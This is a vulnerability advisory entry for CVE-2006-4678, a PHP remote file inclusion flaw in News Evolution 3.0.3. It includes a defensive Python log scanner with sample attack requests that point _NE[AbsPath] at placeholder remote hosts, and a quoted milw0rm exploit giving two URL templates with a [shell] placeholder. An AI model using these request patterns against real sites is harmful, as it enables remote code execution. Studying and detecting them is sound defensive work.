News Evolution PHP Remote File Inclusion Vulnerability

Vulnerability ID: 1110970
Vulnerability type: Unknown
Published: 2006-09-07
Updated: 2006-09-11
CVE ID: CVE-2006-4678
CNNVD-ID: CNNVD-200609-147
Platform: PHP
CVSS score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/2325
https://www.securityfocus.com/bid/83866
https://cxsecurity.com/issue/WLB-2006090064
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-147
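|Vulnerability Details
A PHP remote file inclusion vulnerability in News Evolution 3.0.3 allows remote attackers to execute arbitrary PHP code via the _NE[AbsPath] parameter to (1) install.php and (2) migrateNE2toNE3.php.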
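
An added detection example, not part of the original advisory: it scans web access logs for requests that supply `_NE[AbsPath]` to the two scripts named above, including percent-encoded forms. The combined log format, the function names `classify` and `scan`, and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script names and parameter taken from the advisory text.
SCRIPTS = {"install.php", "migratene2tone3.php"}
PARAM = "_NE[AbsPath]"
# Assumed input: Apache/nginx "combined" access-log lines.
REQ_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3}) ')
# Value starts with a URL scheme/stream wrapper (2+ chars, so "C:" is not
# matched), a protocol-relative "//", or a UNC "\\" prefix.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]+:|//|\\\\)', re.I)

def classify(line):
    """Return a finding dict for one log line, or None if it is unrelated."""
    m = REQ_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in SCRIPTS:
        return None
    # parse_qsl percent-decodes, so _NE%5BAbsPath%5D=http%3A%2F%2F... matches.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == PARAM:
            kind = "remote-include" if REMOTE_RE.match(value) else "path-override"
            return {"client": client, "script": script,
                    "status": int(status), "kind": kind, "value": value}
    return None

def scan(lines):
    """Collect findings from an iterable of log lines."""
    return [f for f in map(classify, lines) if f]

# Constructed sample lines (documentation IP ranges, placeholder hosts).
SAMPLE = [
    '198.51.100.7 - - [07/Sep/2006:10:01:02 +0000] "GET /news/index.php?id=4 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [07/Sep/2006:10:03:11 +0000] "GET /news/install.php?_NE[AbsPath]=http://files.example.net/a.txt? HTTP/1.1" 200 812 "-" "-"',
    '203.0.113.9 - - [07/Sep/2006:10:03:15 +0000] "GET /news/migrateNE2toNE3.php?_NE%5BAbsPath%5D=ftp%3A%2F%2Ffiles.example.net%2Fa.txt HTTP/1.0" 200 790 "-" "-"',
    '198.51.100.7 - - [07/Sep/2006:10:05:40 +0000] "GET /news/install.php?_NE[AbsPath]=/var/www/news/ HTTP/1.1" 404 210 "-" "-"',
    '198.51.100.7 - - [07/Sep/2006:10:06:00 +0000] "GET /news/install.php?step=2 HTTP/1.1" 404 210 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Access logs normally record only the query string, so a value sent in a POST body would not appear here; a 200 status on either script after installation is itself worth reviewing.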
|Exploit
# ERNE ---- ERNEALiZM ---- BU ASK BiTMEZ----
 
# News Evolution v3.0.3 - Remote File Include Vulnerabilities
 
# site    : http://www.comscripts.com/jump.php?action=script&id=825
 
# Script  :  News Evolution v3.0.3
 
# Credits : ERNE
 
# Contact : erne@ernealizm.com  and irc.gigachat.net #kurdhack
 
# Thanks  : BLaCKWHITE, Blackened, Di_lejyoner
 
# Vulnerable :
 
     http://www.site.com/[path]/install.php?_NE[AbsPath]=[shell]
  
     http://www.site.com/[path]/migrateNE2toNE3.php?_NE[AbsPath]=[shell]

# milw0rm.com [2006-09-07]
|Affected Products
Comscripts News Evolution 3.0.3
|References

Source: XF
Name: news-evolution-install-file-include(28803)
Link: http://xforce.iss.net/xforce/xfdb/28803
Source: BUGTRAQ
Name: 20060907 News Evolution v3.0.3 - Remote File Include Vulnerabilities
Link: http://www.securityfocus.com/archive/1/archive/1/445576/100/0/threaded
Source: SREASON
Name: 1536
Link: http://securityreason.com/securityalert/1536